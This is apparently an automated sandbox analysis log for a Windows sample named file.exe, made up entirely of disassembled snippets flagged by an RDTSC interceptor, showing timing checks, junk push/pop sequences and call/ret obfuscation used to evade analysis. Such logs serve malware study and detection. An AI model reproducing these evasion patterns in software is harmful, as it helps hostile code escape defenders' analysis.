Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C01EE second address: 4C0280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72110537B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F72110537ACh 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F72110537A8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b cmc 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F72110537A8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 mov edi, dword ptr [ebp+1246FE21h] 0x0000004e push 00000000h 0x00000050 mov dword ptr [ebp+1248336Eh], edi 0x00000056 xchg eax, ebx 0x00000057 jmp 00007F72110537B1h 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C0016 second address: 4C001B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C0280 second address: 4C028D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F72110537A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C001B second address: 4C0020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C0020 second address: 4C0026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C0D0A second address: 4C0D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7210C23A11h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C188F second address: 4C1895 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C157A second address: 4C1597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7210C23A19h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C1895 second address: 4C18AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F72110537B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C334D second address: 4C3357 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7210C23A0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C3357 second address: 4C337F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F72110537A6h 0x0000000b jnp 00007F72110537A6h 0x00000011 jmp 00007F72110537B5h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46BA64 second address: 46BA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46BA69 second address: 46BA6E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C3A29 second address: 4C3A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4D71 second address: 4C4D85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F72110537A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9013 second address: 4C9017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8220 second address: 4C8226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9017 second address: 4C9098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 jmp 00007F7210C23A0Fh 0x0000000d pop esi 0x0000000e nop 0x0000000f sub edi, dword ptr [ebp+122D36D2h] 0x00000015 push 00000000h 0x00000017 mov ebx, dword ptr [ebp+122D37E6h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F7210C23A08h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 mov edi, 7124D915h 0x0000003e xchg eax, esi 0x0000003f push ecx 0x00000040 pushad 0x00000041 jmp 00007F7210C23A14h 0x00000046 jmp 00007F7210C23A15h 0x0000004b popad 0x0000004c pop ecx 0x0000004d push eax 0x0000004e push esi 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8226 second address: 4C827D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov bx, ax 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F72110537A8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 movsx ebx, si 0x00000037 mov eax, dword ptr [ebp+122D0889h] 0x0000003d sub dword ptr [ebp+12482EA5h], esi 0x00000043 mov ebx, dword ptr [ebp+122D560Ch] 0x00000049 push FFFFFFFFh 0x0000004b nop 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f push esi 0x00000050 pop esi 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C827D second address: 4C8286 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8286 second address: 4C828C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C91D0 second address: 4C91E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7210C23A0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9FC8 second address: 4C9FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C91E9 second address: 4C91F3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7210C23A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9FCC second address: 4CA026 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F72110537ACh 0x00000008 jng 00007F72110537A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F72110537A8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b cmc 0x0000002c push 00000000h 0x0000002e mov bl, cl 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F72110537A8h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB22B second address: 4CB230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE7CC second address: 4CE7ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F72110537B0h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D27D3 second address: 4D27E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D27E3 second address: 4D27EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F72110537A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D48C7 second address: 4D498D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 jmp 00007F7210C23A14h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F7210C23A08h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jmp 00007F7210C23A0Eh 0x0000002c mov ebx, dword ptr [ebp+122D2270h] 0x00000032 push dword ptr fs:[00000000h] 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007F7210C23A08h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000018h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 mov dword ptr [ebp+122D1906h], esi 0x00000059 mov dword ptr [ebp+1247B7DAh], ecx 0x0000005f mov dword ptr fs:[00000000h], esp 0x00000066 and bl, FFFFFFCCh 0x00000069 mov ebx, 231AEDD2h 0x0000006e mov eax, dword ptr [ebp+122D1345h] 0x00000074 mov edi, edx 0x00000076 push FFFFFFFFh 0x00000078 jno 00007F7210C23A1Fh 0x0000007e push eax 0x0000007f push esi 0x00000080 push eax 0x00000081 push edx 0x00000082 jmp 00007F7210C23A0Bh 0x00000087 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D78B8 second address: 4D78BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D78BC second address: 4D78C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D78C0 second address: 4D78D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F72110537A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D798D second address: 4D799D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7210C23A0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D799D second address: 4D79B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72110537ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F72110537A8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D79B7 second address: 4D79CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7210C23A11h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DF9E3 second address: 4DF9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F72110537B4h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DF9FD second address: 4DFA33 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7210C23A0Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jnl 00007F7210C23A1Ch 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 jg 00007F7210C23A06h 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DFA33 second address: 4DFA50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F72110537A6h 0x0000000a jmp 00007F72110537B3h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DF575 second address: 4DF5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7210C23A06h 0x0000000a popad 0x0000000b jmp 00007F7210C23A13h 0x00000010 pop ecx 0x00000011 jo 00007F7210C23A1Eh 0x00000017 push ecx 0x00000018 jl 00007F7210C23A06h 0x0000001e pop ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E2C9F second address: 4E2CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E4221 second address: 4E4225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E4225 second address: 4E4248 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F72110537A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F72110537B0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E4248 second address: 4E424C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E424C second address: 4E4252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E4349 second address: 4E436B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7210C23A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7210C23A13h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E436B second address: 4E439D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72110537B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F72110537ACh 0x0000000f jns 00007F72110537A6h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007F72110537A8h 0x00000022 push esi 0x00000023 pop esi 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E439D second address: 4E43A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E43A3 second address: 4E43D2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F72110537A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F72110537AFh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a jmp 00007F72110537AAh 0x0000001f pop eax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E43D2 second address: 4E43D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB886 second address: 4EB8A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72110537AAh 0x00000007 jmp 00007F72110537B3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EAB7E second address: 4EAB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EAB86 second address: 4EAB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EAB8C second address: 4EAB91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB205 second address: 4EB210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F72110537A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB210 second address: 4EB24A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7210C23A12h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7210C23A13h 0x00000012 jmp 00007F7210C23A0Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB24A second address: 4EB24E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB24E second address: 4EB273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7210C23A15h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB273 second address: 4EB290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72110537B9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB40A second address: 4EB42C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F7210C23A11h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F7210C23A06h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB595 second address: 4EB59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F72110537A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB59F second address: 4EB5CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7210C23A0Eh 0x00000007 jmp 00007F7210C23A0Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F7210C23A0Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE5A1 second address: 4EE5A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE5A5 second address: 4EE5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE5B3 second address: 4EE5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F1AB1 second address: 4F1AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F1AB5 second address: 4F1ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F72110537B5h 0x0000000b pushad 0x0000000c jmp 00007F72110537AAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F7697 second address: 4F769B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60F4 second address: 4F60FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60FA second address: 4F6100 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F655C second address: 4F657C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jmp 00007F72110537B0h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F657C second address: 4F6582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6582 second address: 4F6588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6858 second address: 4F685C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F685C second address: 4F6876 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F72110537B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6876 second address: 4F68A4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7210C23A08h 0x00000008 jp 00007F7210C23A0Ah 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 jmp 00007F7210C23A14h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F68A4 second address: 4F68AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6A2C second address: 4F6A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7210C23A06h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6A3D second address: 4F6A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6A43 second address: 4F6A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6A47 second address: 4F6A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6A4B second address: 4F6A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F710F second address: 4F7138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F72110537A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007F72110537A6h 0x00000016 jnl 00007F72110537A6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F72110537AAh 0x00000024 rdtsc
